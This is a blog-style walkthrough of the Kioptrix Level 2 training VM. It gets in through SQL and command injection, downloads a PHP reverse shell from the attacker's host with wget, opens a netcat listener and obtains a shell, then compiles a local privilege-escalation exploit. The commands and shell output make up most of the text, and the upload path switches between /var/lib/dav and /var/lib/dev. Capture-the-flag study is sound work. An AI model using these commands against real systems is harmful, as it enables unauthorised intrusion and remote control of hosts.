Kioptrix-2 Walkthrough / Notes

basic sql injections gets you in..

using a semi colon ';' finishes the last connection and allows for the next command.


; ls -la

; whoami

; cd /usr/ && ls -la

so we can string commands together using '&&' as per usual from the shell.

we setup a python http server on port 4444 from the directory where the 'php-reverse-shell' resides from pentest monkey.

(we cant use b374k as we cant access the file directly form the URL)

we port forward port 4444 from any IP to our local machine LAN address.

Now we change the IP address in php-reverse-shell to be our public IP and port 4444

next we upload the phpfile - but we cant because we dont have permission in the current directory.

so we find a directory we can write to.


ok so we now we are the user apache

lets now see what directories are owned by apache

;find / -user apache

ok so the directory "/var/lib/dav" looks like a good place to upload our reverse-shell

next we cd into the directory and upload out shell

;cd /var/lib/dav && /usr/bin/wget PUBLIC-IP:4444/php-reverse-shell.php

at the same time make sure youre http server is runnign and in the directory where the php-reverse-shell file resides

#python -m SimpleHTTPServer 4444
Serving HTTP on port 4444 ... - - [19/Sep/2017 17:55:13] "GET /php-reverse-shell.php HTTP/1.0" 200 -

Awesome! out file has been uploaded to the server. lets confirm

;ls -la /var/lib/dev

We should see the file...

Next we need to make sure the file has permission to be executed. 

;chmod 777 /var/lib/dev/php-reverse-shell

And now we have a listener setup on the sending box. (seems backwards...)

;nc -v -n -l -p 4444

ok now we execute the php file, as we cant browse to it we use the 'php' command

;php /var/lib/dev/php-reverse-shell.php

And we should get the shell

listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 32800
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
 17:10:07 up  3:41,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell

Priv escalation spoiler
#gcc -o 9542 9542.c && ./9542

Output to Web Browser
;php /var/lib/dav/php-reverse-shell.php
Content-type: text/html
X-Powered-By: PHP/4.3.9

Content-type: text/html
X-Powered-By: PHP/4.3.9

Successfully opened reverse shell to
ERROR: Shell connection terminated

No comments:

Post a Comment